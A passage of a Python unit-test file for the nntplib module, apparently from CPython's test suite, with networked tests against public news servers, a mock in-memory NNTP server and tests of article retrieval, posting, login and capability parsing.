def wrap_meth(meth):
@functools.wraps(meth)
def wrapped(self):
with support.transient_internet(self.NNTP_HOST):
meth(self)
return wrapped
for name in dir(cls):
if not name.startswith('test_'):
continue
meth = getattr(cls, name)
if not callable(meth):
continue
# Need to use a closure so that meth remains bound to its current
# value
setattr(cls, name, wrap_meth(meth))
def test_with_statement(self):
def is_connected():
if not hasattr(server, 'file'):
return False
try:
server.help()
except (OSError, EOFError):
return False
return True
try:
with self.NNTP_CLASS(self.NNTP_HOST, timeout=TIMEOUT, usenetrc=False) as server:
self.assertTrue(is_connected())
self.assertTrue(server.help())
self.assertFalse(is_connected())
with self.NNTP_CLASS(self.NNTP_HOST, timeout=TIMEOUT, usenetrc=False) as server:
server.quit()
self.assertFalse(is_connected())
except SSLError as ssl_err:
# matches "[SSL: DH_KEY_TOO_SMALL] dh key too small"
if re.search(r'(?i)KEY.TOO.SMALL', ssl_err.reason):
raise unittest.SkipTest(f"Got {ssl_err} connecting "
f"to {self.NNTP_HOST!r}")
raise
NetworkedNNTPTestsMixin.wrap_methods()
EOF_ERRORS = (EOFError,)
if ssl is not None:
EOF_ERRORS += (ssl.SSLEOFError,)
class NetworkedNNTPTests(NetworkedNNTPTestsMixin, unittest.TestCase):
# This server supports STARTTLS (gmane doesn't)
NNTP_HOST = 'news.trigofacile.com'
GROUP_NAME = 'fr.comp.lang.python'
GROUP_PAT = 'fr.comp.lang.*'
NNTP_CLASS = NNTP
@classmethod
def setUpClass(cls):
support.requires("network")
with support.transient_internet(cls.NNTP_HOST):
try:
cls.server = cls.NNTP_CLASS(cls.NNTP_HOST, timeout=TIMEOUT,
usenetrc=False)
except SSLError as ssl_err:
# matches "[SSL: DH_KEY_TOO_SMALL] dh key too small"
if re.search(r'(?i)KEY.TOO.SMALL', ssl_err.reason):
raise unittest.SkipTest(f"{cls} got {ssl_err} connecting "
f"to {cls.NNTP_HOST!r}")
raise
except EOF_ERRORS:
raise unittest.SkipTest(f"{cls} got EOF error on connecting "
f"to {cls.NNTP_HOST!r}")
@classmethod
def tearDownClass(cls):
if cls.server is not None:
cls.server.quit()
@unittest.skipUnless(ssl, 'requires SSL support')
class NetworkedNNTP_SSLTests(NetworkedNNTPTests):
# Technical limits for this public NNTP server (see http://www.aioe.org):
# "Only two concurrent connections per IP address are allowed and
# 400 connections per day are accepted from each IP address."
NNTP_HOST = 'nntp.aioe.org'
GROUP_NAME = 'comp.lang.python'
GROUP_PAT = 'comp.lang.*'
NNTP_CLASS = getattr(nntplib, 'NNTP_SSL', None)
# Disabled as it produces too much data
test_list = None
# Disabled as the connection will already be encrypted.
test_starttls = None
#
# Non-networked tests using a local server (or something mocking it).
#
class _NNTPServerIO(io.RawIOBase):
"""A raw IO object allowing NNTP commands to be received and processed
by a handler. The handler can push responses which can then be read
from the IO object."""
def __init__(self, handler):
io.RawIOBase.__init__(self)
# The channel from the client
self.c2s = io.BytesIO()
# The channel to the client
self.s2c = io.BytesIO()
self.handler = handler
self.handler.start(self.c2s.readline, self.push_data)
def readable(self):
return True
def writable(self):
return True
def push_data(self, data):
"""Push (buffer) some data to send to the client."""
pos = self.s2c.tell()
self.s2c.seek(0, 2)
self.s2c.write(data)
self.s2c.seek(pos)
def write(self, b):
"""The client sends us some data"""
pos = self.c2s.tell()
self.c2s.write(b)
self.c2s.seek(pos)
self.handler.process_pending()
return len(b)
def readinto(self, buf):
"""The client wants to read a response"""
self.handler.process_pending()
b = self.s2c.read(len(buf))
n = len(b)
buf[:n] = b
return n
def make_mock_file(handler):
sio = _NNTPServerIO(handler)
# Using BufferedRWPair instead of BufferedRandom ensures the file
# isn't seekable.
file = io.BufferedRWPair(sio, sio)
return (sio, file)
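# How the mock plumbing fits together: the handler pushes canned server responses into
# _NNTPServerIO via push_data(), and every write() from the NNTP client side triggers
# handler.process_pending(), so a complete command/response round trip happens entirely
# in memory without a real socket.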
class MockedNNTPTestsMixin:
# Override in derived classes
handler_class = None
def setUp(self):
super().setUp()
self.make_server()
def tearDown(self):
super().tearDown()
del self.server
def make_server(self, *args, **kwargs):
self.handler = self.handler_class()
self.sio, file = make_mock_file(self.handler)
self.server = nntplib._NNTPBase(file, 'test.server', *args, **kwargs)
return self.server
class MockedNNTPWithReaderModeMixin(MockedNNTPTestsMixin):
def setUp(self):
super().setUp()
self.make_server(readermode=True)
class NNTPv1Handler:
"""A handler for RFC 977"""
welcome = "200 NNTP mock server"
def start(self, readline, push_data):
self.in_body = False
self.allow_posting = True
self._readline = readline
self._push_data = push_data
self._logged_in = False
self._user_sent = False
# Our welcome
self.handle_welcome()
def _decode(self, data):
return str(data, "utf-8", "surrogateescape")
def process_pending(self):
if self.in_body:
while True:
line = self._readline()
if not line:
return
self.body.append(line)
if line == b".\r\n":
break
try:
meth, tokens = self.body_callback
meth(*tokens, body=self.body)
finally:
self.body_callback = None
self.body = None
self.in_body = False
while True:
line = self._decode(self._readline())
if not line:
return
if not line.endswith("\r\n"):
raise ValueError("line doesn't end with \\r\\n: {!r}".format(line))
line = line[:-2]
cmd, *tokens = line.split()
#meth = getattr(self.handler, "handle_" + cmd.upper(), None)
meth = getattr(self, "handle_" + cmd.upper(), None)
if meth is None:
self.handle_unknown()
else:
try:
meth(*tokens)
except Exception as e:
raise ValueError("command failed: {!r}".format(line)) from e
else:
if self.in_body:
self.body_callback = meth, tokens
self.body = []
def expect_body(self):
"""Flag that the client is expected to post a request body"""
self.in_body = True
def push_data(self, data):
"""Push some binary data"""
self._push_data(data)
def push_lit(self, lit):
"""Push a string literal"""
lit = textwrap.dedent(lit)
lit = "\r\n".join(lit.splitlines()) + "\r\n"
lit = lit.encode('utf-8')
self.push_data(lit)
def handle_unknown(self):
self.push_lit("500 What?")
def handle_welcome(self):
self.push_lit(self.welcome)
def handle_QUIT(self):
self.push_lit("205 Bye!")
def handle_DATE(self):
self.push_lit("111 20100914001155")
def handle_GROUP(self, group):
if group == "fr.comp.lang.python":
self.push_lit("211 486 761 1265 fr.comp.lang.python")
else:
self.push_lit("411 No such group {}".format(group))
def handle_HELP(self):
self.push_lit("""\
100 Legal commands
authinfo user Name|pass Password|generic <prog> <args>
date
help
Report problems to <[email protected]>
.""")
def handle_STAT(self, message_spec=None):
if message_spec is None:
self.push_lit("412 No newsgroup selected")
elif message_spec == "3000234":
self.push_lit("223 3000234 <[email protected]>")
elif message_spec == "<[email protected]>":
self.push_lit("223 0 <[email protected]>")
else:
self.push_lit("430 No Such Article Found")
def handle_NEXT(self):
self.push_lit("223 3000237 <[email protected]> retrieved")
def handle_LAST(self):
self.push_lit("223 3000234 <[email protected]> retrieved")
def handle_LIST(self, action=None, param=None):
if action is None:
self.push_lit("""\
215 Newsgroups in form "group high low flags".
comp.lang.python 0000052340 0000002828 y
comp.lang.python.announce 0000001153 0000000993 m
free.it.comp.lang.python 0000000002 0000000002 y
fr.comp.lang.python 0000001254 0000000760 y
free.it.comp.lang.python.learner 0000000000 0000000001 y
tw.bbs.comp.lang.python 0000000304 0000000304 y
.""")
elif action == "ACTIVE":
if param == "*distutils*":
self.push_lit("""\
215 Newsgroups in form "group high low flags"
gmane.comp.python.distutils.devel 0000014104 0000000001 m
gmane.comp.python.distutils.cvs 0000000000 0000000001 m
.""")
else:
self.push_lit("""\
215 Newsgroups in form "group high low flags"
.""")
elif action == "OVERVIEW.FMT":
self.push_lit("""\
215 Order of fields in overview database.
Subject:
From:
Date:
Message-ID:
References:
Bytes:
Lines:
Xref:full
.""")
elif action == "NEWSGROUPS":
assert param is not None
if param == "comp.lang.python":
self.push_lit("""\
215 Descriptions in form "group description".
comp.lang.python\tThe Python computer language.
.""")
elif param == "comp.lang.python*":
self.push_lit("""\
215 Descriptions in form "group description".
comp.lang.python.announce\tAnnouncements about the Python language. (Moderated)
comp.lang.python\tThe Python computer language.
.""")
else:
self.push_lit("""\
215 Descriptions in form "group description".
.""")
else:
self.push_lit('501 Unknown LIST keyword')
def handle_NEWNEWS(self, group, date_str, time_str):
# We hard code different return messages depending on passed
# argument and date syntax.
if (group == "comp.lang.python" and date_str == "20100913"
and time_str == "082004"):
# Date was passed in RFC 3977 format (NNTP "v2")
self.push_lit("""\
230 list of newsarticles (NNTP v2) created after Mon Sep 13 08:20:04 2010 follows
<[email protected]>
<[email protected]>
.""")
elif (group == "comp.lang.python" and date_str == "100913"
and time_str == "082004"):
# Date was passed in RFC 977 format (NNTP "v1")
self.push_lit("""\
230 list of newsarticles (NNTP v1) created after Mon Sep 13 08:20:04 2010 follows
<[email protected]>
<[email protected]>
.""")
elif (group == 'comp.lang.python' and
date_str in ('20100101', '100101') and
time_str == '090000'):
self.push_lit('too long line' * 3000 +
'\n.')
else:
self.push_lit("""\
230 An empty list of newsarticles follows
.""")
# (Note for experiments: many servers disable NEWNEWS.
# As of this writing, sicinfo3.epfl.ch doesn't.)
def handle_XOVER(self, message_spec):
if message_spec == "57-59":
self.push_lit(
"224 Overview information for 57-58 follows\n"
"57\tRe: ANN: New Plone book with strong Python (and Zope) themes throughout"
"\tDoug Hellmann <[email protected]>"
"\tSat, 19 Jun 2010 18:04:08 -0400"
"\t<[email protected]>"
"\t<[email protected]>\t7103\t16"
"\tXref: news.gmane.io gmane.comp.python.authors:57"
"\n"
"58\tLooking for a few good bloggers"
"\tDoug Hellmann <[email protected]>"
"\tThu, 22 Jul 2010 09:14:14 -0400"
"\t<[email protected]>"
"\t\t6683\t16"
"\t"
"\n"
# A UTF-8 overview line from fr.comp.lang.python
"59\tRe: Message d'erreur incompréhensible (par moi)"
"\tEric Brunel <[email protected]>"
"\tWed, 15 Sep 2010 18:09:15 +0200"
"\t<[email protected]>"
"\t<[email protected]>\t1641\t27"
"\tXref: saria.nerim.net fr.comp.lang.python:1265"
"\n"
".\n")
else:
self.push_lit("""\
224 No articles
.""")
def handle_POST(self, *, body=None):
if body is None:
if self.allow_posting:
self.push_lit("340 Input article; end with <CR-LF>.<CR-LF>")
self.expect_body()
else:
self.push_lit("440 Posting not permitted")
else:
assert self.allow_posting
self.push_lit("240 Article received OK")
self.posted_body = body
def handle_IHAVE(self, message_id, *, body=None):
if body is None:
if (self.allow_posting and
message_id == "<[email protected]>"):
self.push_lit("335 Send it; end with <CR-LF>.<CR-LF>")
self.expect_body()
else:
self.push_lit("435 Article not wanted")
else:
assert self.allow_posting
self.push_lit("235 Article transferred OK")
self.posted_body = body
sample_head = """\
From: "Demo User" <[email protected]>
Subject: I am just a test article
Content-Type: text/plain; charset=UTF-8; format=flowed
Message-ID: <[email protected]>"""
sample_body = """\
This is just a test article.
..Here is a dot-starting line.
-- Signed by Andr\xe9."""
sample_article = sample_head + "\n\n" + sample_body
def handle_ARTICLE(self, message_spec=None):
if message_spec is None:
self.push_lit("220 3000237 <[email protected]>")
elif message_spec == "<[email protected]>":
self.push_lit("220 0 <[email protected]>")
elif message_spec == "3000234":
self.push_lit("220 3000234 <[email protected]>")
else:
self.push_lit("430 No Such Article Found")
return
self.push_lit(self.sample_article)
self.push_lit(".")
def handle_HEAD(self, message_spec=None):
if message_spec is None:
self.push_lit("221 3000237 <[email protected]>")
elif message_spec == "<[email protected]>":
self.push_lit("221 0 <[email protected]>")
elif message_spec == "3000234":
self.push_lit("221 3000234 <[email protected]>")
else:
self.push_lit("430 No Such Article Found")
return
self.push_lit(self.sample_head)
self.push_lit(".")
def handle_BODY(self, message_spec=None):
if message_spec is None:
self.push_lit("222 3000237 <[email protected]>")
elif message_spec == "<[email protected]>":
self.push_lit("222 0 <[email protected]>")
elif message_spec == "3000234":
self.push_lit("222 3000234 <[email protected]>")
else:
self.push_lit("430 No Such Article Found")
return
self.push_lit(self.sample_body)
self.push_lit(".")
def handle_AUTHINFO(self, cred_type, data):
if self._logged_in:
self.push_lit('502 Already Logged In')
elif cred_type == 'user':
if self._user_sent:
self.push_lit('482 User Credential Already Sent')
else:
self.push_lit('381 Password Required')
self._user_sent = True
elif cred_type == 'pass':
self.push_lit('281 Login Successful')
self._logged_in = True
else:
raise Exception('Unknown cred type {}'.format(cred_type))
class NNTPv2Handler(NNTPv1Handler):
"""A handler for RFC 3977 (NNTP "v2")"""
def handle_CAPABILITIES(self):
fmt = """\
101 Capability list:
VERSION 2 3
IMPLEMENTATION INN 2.5.1{}
HDR
LIST ACTIVE ACTIVE.TIMES DISTRIB.PATS HEADERS NEWSGROUPS OVERVIEW.FMT
OVER
POST
READER
."""
if not self._logged_in:
self.push_lit(fmt.format('\n AUTHINFO USER'))
else:
self.push_lit(fmt.format(''))
def handle_MODE(self, _):
        raise Exception('MODE READER sent despite READER being advertised')
def handle_OVER(self, message_spec=None):
return self.handle_XOVER(message_spec)
class CapsAfterLoginNNTPv2Handler(NNTPv2Handler):
"""A handler that allows CAPABILITIES only after login"""
def handle_CAPABILITIES(self):
if not self._logged_in:
self.push_lit('480 You must log in.')
else:
super().handle_CAPABILITIES()
class ModeSwitchingNNTPv2Handler(NNTPv2Handler):
"""A server that starts in transit mode"""
def __init__(self):
self._switched = False
def handle_CAPABILITIES(self):
fmt = """\
101 Capability list:
VERSION 2 3
IMPLEMENTATION INN 2.5.1
HDR
LIST ACTIVE ACTIVE.TIMES DISTRIB.PATS HEADERS NEWSGROUPS OVERVIEW.FMT
OVER
POST
{}READER
."""
if self._switched:
self.push_lit(fmt.format(''))
else:
self.push_lit(fmt.format('MODE-'))
def handle_MODE(self, what):
assert not self._switched and what == 'reader'
self._switched = True
self.push_lit('200 Posting allowed')
class NNTPv1v2TestsMixin:
def setUp(self):
super().setUp()
def test_welcome(self):
self.assertEqual(self.server.welcome, self.handler.welcome)
def test_authinfo(self):
if self.nntp_version == 2:
self.assertIn('AUTHINFO', self.server._caps)
self.server.login('testuser', 'testpw')
# if AUTHINFO is gone from _caps we also know that getcapabilities()
# has been called after login as it should
self.assertNotIn('AUTHINFO', self.server._caps)
def test_date(self):
resp, date = self.server.date()
self.assertEqual(resp, "111 20100914001155")
self.assertEqual(date, datetime.datetime(2010, 9, 14, 0, 11, 55))
def test_quit(self):
self.assertFalse(self.sio.closed)
resp = self.server.quit()
self.assertEqual(resp, "205 Bye!")
self.assertTrue(self.sio.closed)
def test_help(self):
resp, help = self.server.help()
self.assertEqual(resp, "100 Legal commands")
self.assertEqual(help, [
' authinfo user Name|pass Password|generic <prog> <args>',
' date',
' help',
'Report problems to <[email protected]>',
])
def test_list(self):
resp, groups = self.server.list()
self.assertEqual(len(groups), 6)
g = groups[1]
self.assertEqual(g,
GroupInfo("comp.lang.python.announce", "0000001153",
"0000000993", "m"))
resp, groups = self.server.list("*distutils*")
self.assertEqual(len(groups), 2)
g = groups[0]
self.assertEqual(g,
GroupInfo("gmane.comp.python.distutils.devel", "0000014104",
"0000000001", "m"))
def test_stat(self):
resp, art_num, message_id = self.server.stat(3000234)
self.assertEqual(resp, "223 3000234 <[email protected]>")
self.assertEqual(art_num, 3000234)
self.assertEqual(message_id, "<[email protected]>")
resp, art_num, message_id = self.server.stat("<[email protected]>")
self.assertEqual(resp, "223 0 <[email protected]>")
self.assertEqual(art_num, 0)
self.assertEqual(message_id, "<[email protected]>")
with self.assertRaises(nntplib.NNTPTemporaryError) as cm:
self.server.stat("<non.existent.id>")
self.assertEqual(cm.exception.response, "430 No Such Article Found")
with self.assertRaises(nntplib.NNTPTemporaryError) as cm:
self.server.stat()
self.assertEqual(cm.exception.response, "412 No newsgroup selected")
def test_next(self):
resp, art_num, message_id = self.server.next()
self.assertEqual(resp, "223 3000237 <[email protected]> retrieved")
self.assertEqual(art_num, 3000237)
self.assertEqual(message_id, "<[email protected]>")
def test_last(self):
resp, art_num, message_id = self.server.last()
self.assertEqual(resp, "223 3000234 <[email protected]> retrieved")
self.assertEqual(art_num, 3000234)
self.assertEqual(message_id, "<[email protected]>")
def test_description(self):
desc = self.server.description("comp.lang.python")
self.assertEqual(desc, "The Python computer language.")
desc = self.server.description("comp.lang.pythonx")
self.assertEqual(desc, "")
def test_descriptions(self):
resp, groups = self.server.descriptions("comp.lang.python")
self.assertEqual(resp, '215 Descriptions in form "group description".')
self.assertEqual(groups, {
"comp.lang.python": "The Python computer language.",
})
resp, groups = self.server.descriptions("comp.lang.python*")
self.assertEqual(groups, {
"comp.lang.python": "The Python computer language.",
"comp.lang.python.announce": "Announcements about the Python language. (Moderated)",
})
resp, groups = self.server.descriptions("comp.lang.pythonx")
self.assertEqual(groups, {})
def test_group(self):
resp, count, first, last, group = self.server.group("fr.comp.lang.python")
self.assertTrue(resp.startswith("211 "), resp)
self.assertEqual(first, 761)
self.assertEqual(last, 1265)
self.assertEqual(count, 486)
self.assertEqual(group, "fr.comp.lang.python")
with self.assertRaises(nntplib.NNTPTemporaryError) as cm:
self.server.group("comp.lang.python.devel")
exc = cm.exception
self.assertTrue(exc.response.startswith("411 No such group"),
exc.response)
def test_newnews(self):
# NEWNEWS comp.lang.python [20]100913 082004
dt = datetime.datetime(2010, 9, 13, 8, 20, 4)
resp, ids = self.server.newnews("comp.lang.python", dt)
expected = (
"230 list of newsarticles (NNTP v{0}) "
"created after Mon Sep 13 08:20:04 2010 follows"
).format(self.nntp_version)
self.assertEqual(resp, expected)
self.assertEqual(ids, [
"<[email protected]>",
"<[email protected]>",
])
# NEWNEWS fr.comp.lang.python [20]100913 082004
dt = datetime.datetime(2010, 9, 13, 8, 20, 4)
resp, ids = self.server.newnews("fr.comp.lang.python", dt)
self.assertEqual(resp, "230 An empty list of newsarticles follows")
self.assertEqual(ids, [])
def _check_article_body(self, lines):
self.assertEqual(len(lines), 4)
self.assertEqual(lines[-1].decode('utf-8'), "-- Signed by André.")
self.assertEqual(lines[-2], b"")
self.assertEqual(lines[-3], b".Here is a dot-starting line.")
self.assertEqual(lines[-4], b"This is just a test article.")
def _check_article_head(self, lines):
self.assertEqual(len(lines), 4)
self.assertEqual(lines[0], b'From: "Demo User" <[email protected]>')
self.assertEqual(lines[3], b"Message-ID: <[email protected]>")
def _check_article_data(self, lines):
self.assertEqual(len(lines), 9)
self._check_article_head(lines[:4])
self._check_article_body(lines[-4:])
self.assertEqual(lines[4], b"")
def test_article(self):
# ARTICLE
resp, info = self.server.article()
self.assertEqual(resp, "220 3000237 <[email protected]>")
art_num, message_id, lines = info
self.assertEqual(art_num, 3000237)
self.assertEqual(message_id, "<[email protected]>")
self._check_article_data(lines)
# ARTICLE num
resp, info = self.server.article(3000234)
self.assertEqual(resp, "220 3000234 <[email protected]>")
art_num, message_id, lines = info
self.assertEqual(art_num, 3000234)
self.assertEqual(message_id, "<[email protected]>")
self._check_article_data(lines)
# ARTICLE id
resp, info = self.server.article("<[email protected]>")
self.assertEqual(resp, "220 0 <[email protected]>")
art_num, message_id, lines = info
self.assertEqual(art_num, 0)
self.assertEqual(message_id, "<[email protected]>")
self._check_article_data(lines)
# Non-existent id
with self.assertRaises(nntplib.NNTPTemporaryError) as cm:
self.server.article("<[email protected]>")
self.assertEqual(cm.exception.response, "430 No Such Article Found")
def test_article_file(self):
# With a "file" argument
f = io.BytesIO()
resp, info = self.server.article(file=f)
self.assertEqual(resp, "220 3000237 <[email protected]>")
art_num, message_id, lines = info
self.assertEqual(art_num, 3000237)
self.assertEqual(message_id, "<[email protected]>")
self.assertEqual(lines, [])
data = f.getvalue()
self.assertTrue(data.startswith(
b'From: "Demo User" <[email protected]>\r\n'
b'Subject: I am just a test article\r\n'
), ascii(data))
self.assertTrue(data.endswith(
b'This is just a test article.\r\n'
b'.Here is a dot-starting line.\r\n'
b'\r\n'
b'-- Signed by Andr\xc3\xa9.\r\n'
), ascii(data))
def test_head(self):
# HEAD
resp, info = self.server.head()
self.assertEqual(resp, "221 3000237 <[email protected]>")
art_num, message_id, lines = info
self.assertEqual(art_num, 3000237)
self.assertEqual(message_id, "<[email protected]>")
self._check_article_head(lines)
# HEAD num
resp, info = self.server.head(3000234)
self.assertEqual(resp, "221 3000234 <[email protected]>")
art_num, message_id, lines = info
self.assertEqual(art_num, 3000234)
self.assertEqual(message_id, "<[email protected]>")
self._check_article_head(lines)
# HEAD id
resp, info = self.server.head("<[email protected]>")
self.assertEqual(resp, "221 0 <[email protected]>")
art_num, message_id, lines = info
self.assertEqual(art_num, 0)
self.assertEqual(message_id, "<[email protected]>")
self._check_article_head(lines)
# Non-existent id
with self.assertRaises(nntplib.NNTPTemporaryError) as cm:
self.server.head("<[email protected]>")
self.assertEqual(cm.exception.response, "430 No Such Article Found")
def test_head_file(self):
f = io.BytesIO()
resp, info = self.server.head(file=f)
self.assertEqual(resp, "221 3000237 <[email protected]>")
art_num, message_id, lines = info
self.assertEqual(art_num, 3000237)
self.assertEqual(message_id, "<[email protected]>")
self.assertEqual(lines, [])
data = f.getvalue()
self.assertTrue(data.startswith(
b'From: "Demo User" <[email protected]>\r\n'
b'Subject: I am just a test article\r\n'
), ascii(data))
self.assertFalse(data.endswith(
b'This is just a test article.\r\n'
b'.Here is a dot-starting line.\r\n'
b'\r\n'
b'-- Signed by Andr\xc3\xa9.\r\n'
), ascii(data))
def test_body(self):
# BODY
resp, info = self.server.body()
self.assertEqual(resp, "222 3000237 <[email protected]>")
art_num, message_id, lines = info
self.assertEqual(art_num, 3000237)
self.assertEqual(message_id, "<[email protected]>")
self._check_article_body(lines)
# BODY num
resp, info = self.server.body(3000234)
self.assertEqual(resp, "222 3000234 <[email protected]>")
art_num, message_id, lines = info
self.assertEqual(art_num, 3000234)
self.assertEqual(message_id, "<[email protected]>")
self._check_article_body(lines)
# BODY id
resp, info = self.server.body("<[email protected]>")
self.assertEqual(resp, "222 0 <[email protected]>")
art_num, message_id, lines = info
self.assertEqual(art_num, 0)
self.assertEqual(message_id, "<[email protected]>")
self._check_article_body(lines)
# Non-existent id
with self.assertRaises(nntplib.NNTPTemporaryError) as cm:
self.server.body("<[email protected]>")
self.assertEqual(cm.exception.response, "430 No Such Article Found")
def test_body_file(self):
f = io.BytesIO()
resp, info = self.server.body(file=f)
self.assertEqual(resp, "222 3000237 <[email protected]>")
art_num, message_id, lines = info
self.assertEqual(art_num, 3000237)
self.assertEqual(message_id, "<[email protected]>")
self.assertEqual(lines, [])
data = f.getvalue()
self.assertFalse(data.startswith(
b'From: "Demo User" <[email protected]>\r\n'
b'Subject: I am just a test article\r\n'
), ascii(data))
self.assertTrue(data.endswith(
b'This is just a test article.\r\n'
b'.Here is a dot-starting line.\r\n'
b'\r\n'
b'-- Signed by Andr\xc3\xa9.\r\n'
), ascii(data))
def check_over_xover_resp(self, resp, overviews):
self.assertTrue(resp.startswith("224 "), resp)
self.assertEqual(len(overviews), 3)
art_num, over = overviews[0]
self.assertEqual(art_num, 57)
self.assertEqual(over, {
"from": "Doug Hellmann <[email protected]>",
"subject": "Re: ANN: New Plone book with strong Python (and Zope) themes throughout",
"date": "Sat, 19 Jun 2010 18:04:08 -0400",
"message-id": "<[email protected]>",
"references": "<[email protected]>",
":bytes": "7103",
":lines": "16",
"xref": "news.gmane.io gmane.comp.python.authors:57"
})
art_num, over = overviews[1]
self.assertEqual(over["xref"], None)
art_num, over = overviews[2]
self.assertEqual(over["subject"],
"Re: Message d'erreur incompréhensible (par moi)")
def test_xover(self):
resp, overviews = self.server.xover(57, 59)
self.check_over_xover_resp(resp, overviews)
def test_over(self):
# In NNTP "v1", this will fallback on XOVER
resp, overviews = self.server.over((57, 59))
self.check_over_xover_resp(resp, overviews)
sample_post = (
b'From: "Demo User" <[email protected]>\r\n'
b'Subject: I am just a test article\r\n'
b'Content-Type: text/plain; charset=UTF-8; format=flowed\r\n'
b'Message-ID: <[email protected]>\r\n'
b'\r\n'
b'This is just a test article.\r\n'
b'.Here is a dot-starting line.\r\n'
b'\r\n'
b'-- Signed by Andr\xc3\xa9.\r\n'
)
def _check_posted_body(self):
# Check the raw body as received by the server
lines = self.handler.posted_body
# One additional line for the "." terminator
self.assertEqual(len(lines), 10)
self.assertEqual(lines[-1], b'.\r\n')
self.assertEqual(lines[-2], b'-- Signed by Andr\xc3\xa9.\r\n')
self.assertEqual(lines[-3], b'\r\n')
self.assertEqual(lines[-4], b'..Here is a dot-starting line.\r\n')
self.assertEqual(lines[0], b'From: "Demo User" <[email protected]>\r\n')
def _check_post_ihave_sub(self, func, *args, file_factory):
# First the prepared post with CRLF endings
post = self.sample_post
func_args = args + (file_factory(post),)
self.handler.posted_body = None
resp = func(*func_args)
self._check_posted_body()
# Then the same post with "normal" line endings - they should be
# converted by NNTP.post and NNTP.ihave.
post = self.sample_post.replace(b"\r\n", b"\n")
func_args = args + (file_factory(post),)
self.handler.posted_body = None
resp = func(*func_args)
self._check_posted_body()
return resp
def check_post_ihave(self, func, success_resp, *args):
# With a bytes object
resp = self._check_post_ihave_sub(func, *args, file_factory=bytes)
self.assertEqual(resp, success_resp)
# With a bytearray object
resp = self._check_post_ihave_sub(func, *args, file_factory=bytearray)
self.assertEqual(resp, success_resp)
# With a file object
resp = self._check_post_ihave_sub(func, *args, file_factory=io.BytesIO)
self.assertEqual(resp, success_resp)
# With an iterable of terminated lines
def iterlines(b):
return iter(b.splitlines(keepends=True))
resp = self._check_post_ihave_sub(func, *args, file_factory=iterlines)
self.assertEqual(resp, success_resp)
# With an iterable of non-terminated lines
def iterlines(b):
return iter(b.splitlines(keepends=False))
resp = self._check_post_ihave_sub(func, *args, file_factory=iterlines)
self.assertEqual(resp, success_resp)
def test_post(self):
self.check_post_ihave(self.server.post, "240 Article received OK")
self.handler.allow_posting = False
with self.assertRaises(nntplib.NNTPTemporaryError) as cm:
self.server.post(self.sample_post)
self.assertEqual(cm.exception.response,
"440 Posting not permitted")
def test_ihave(self):
self.check_post_ihave(self.server.ihave, "235 Article transferred OK",
"<[email protected]>")
with self.assertRaises(nntplib.NNTPTemporaryError) as cm:
self.server.ihave("<another.message.id>", self.sample_post)
self.assertEqual(cm.exception.response,
"435 Article not wanted")
def test_too_long_lines(self):
dt = datetime.datetime(2010, 1, 1, 9, 0, 0)
self.assertRaises(nntplib.NNTPDataError,
self.server.newnews, "comp.lang.python", dt)
class NNTPv1Tests(NNTPv1v2TestsMixin, MockedNNTPTestsMixin, unittest.TestCase):
"""Tests an NNTP v1 server (no capabilities)."""
nntp_version = 1
handler_class = NNTPv1Handler
def test_caps(self):
caps = self.server.getcapabilities()
self.assertEqual(caps, {})
self.assertEqual(self.server.nntp_version, 1)
self.assertEqual(self.server.nntp_implementation, None)
class NNTPv2Tests(NNTPv1v2TestsMixin, MockedNNTPTestsMixin, unittest.TestCase):
"""Tests an NNTP v2 server (with capabilities)."""
nntp_version = 2
handler_class = NNTPv2Handler
def test_caps(self):
caps = self.server.getcapabilities()
self.assertEqual(caps, {
'VERSION': ['2', '3'],
'IMPLEMENTATION': ['INN', '2.5.1'],
'AUTHINFO': ['USER'],
'HDR': [],
'LIST': ['ACTIVE', 'ACTIVE.TIMES', 'DISTRIB.PATS',
'HEADERS', 'NEWSGROUPS', 'OVERVIEW.FMT'],
'OVER': [],
'POST': [],
'READER': [],
})
self.assertEqual(self.server.nntp_version, 3)
self.assertEqual(self.server.nntp_implementation, 'INN 2.5.1')
class CapsAfterLoginNNTPv2Tests(MockedNNTPTestsMixin, unittest.TestCase):
"""Tests a probably NNTP v2 server with capabilities only after login."""
nntp_version = 2
handler_class = CapsAfterLoginNNTPv2Handler
def test_caps_only_after_login(self):
self.assertEqual(self.server._caps, {})
self.server.login('testuser', 'testpw')
self.assertIn('VERSION', self.server._caps)
class SendReaderNNTPv2Tests(MockedNNTPWithReaderModeMixin,
unittest.TestCase):
"""Same tests as for v2 but we tell NTTP to send MODE READER to a server
that isn't in READER mode by default."""
nntp_version = 2
handler_class = ModeSwitchingNNTPv2Handler
def test_we_are_in_reader_mode_after_connect(self):
self.assertIn('READER', self.server._caps)
class MiscTests(unittest.TestCase):
def test_decode_header(self):
def gives(a, b):
self.assertEqual(nntplib.decode_header(a), b)
gives("" , "")
gives("a plain header", "a plain header")
gives(" with extra spaces ", " with extra spaces ")
gives("=?ISO-8859-15?Q?D=E9buter_en_Python?=", "Débuter en Python")
gives("=?utf-8?q?Re=3A_=5Bsqlite=5D_probl=C3=A8me_avec_ORDER_BY_sur_des_cha?="
" =?utf-8?q?=C3=AEnes_de_caract=C3=A8res_accentu=C3=A9es?=",
"Re: [sqlite] problème avec ORDER BY sur des chaînes de caractères accentuées")
gives("Re: =?UTF-8?B?cHJvYmzDqG1lIGRlIG1hdHJpY2U=?=",
"Re: problème de matrice")
# A natively utf-8 header (found in the real world!)
gives("Re: Message d'erreur incompréhensible (par moi)",
"Re: Message d'erreur incompréhensible (par moi)")
def test_parse_overview_fmt(self):
# The minimal (default) response
lines = ["Subject:", "From:", "Date:", "Message-ID:",
"References:", ":bytes", ":lines"]
self.assertEqual(nntplib._parse_overview_fmt(lines),
["subject", "from", "date", "message-id", "references",
":bytes", ":lines"])
# The minimal response using alternative names
lines = ["Subject:", "From:", "Date:", "Message-ID:",
"References:", "Bytes:", "Lines:"]
self.assertEqual(nntplib._parse_overview_fmt(lines),
["subject", "from", "date", "message-id", "references",
":bytes", ":lines"])
# Variations in casing
lines = ["subject:", "FROM:", "DaTe:", "message-ID:",
"References:", "BYTES:", "Lines:"]
self.assertEqual(nntplib._parse_overview_fmt(lines),
["subject", "from", "date", "message-id", "references",
":bytes", ":lines"])
# First example from RFC 3977
lines = ["Subject:", "From:", "Date:", "Message-ID:",
"References:", ":bytes", ":lines", "Xref:full",
"Distribution:full"]
self.assertEqual(nntplib._parse_overview_fmt(lines),
["subject", "from", "date", "message-id", "references",
":bytes", ":lines", "xref", "distribution"])
# Second example from RFC 3977
lines = ["Subject:", "From:", "Date:", "Message-ID:",
"References:", "Bytes:", "Lines:", "Xref:FULL",
"Distribution:FULL"]
self.assertEqual(nntplib._parse_overview_fmt(lines),
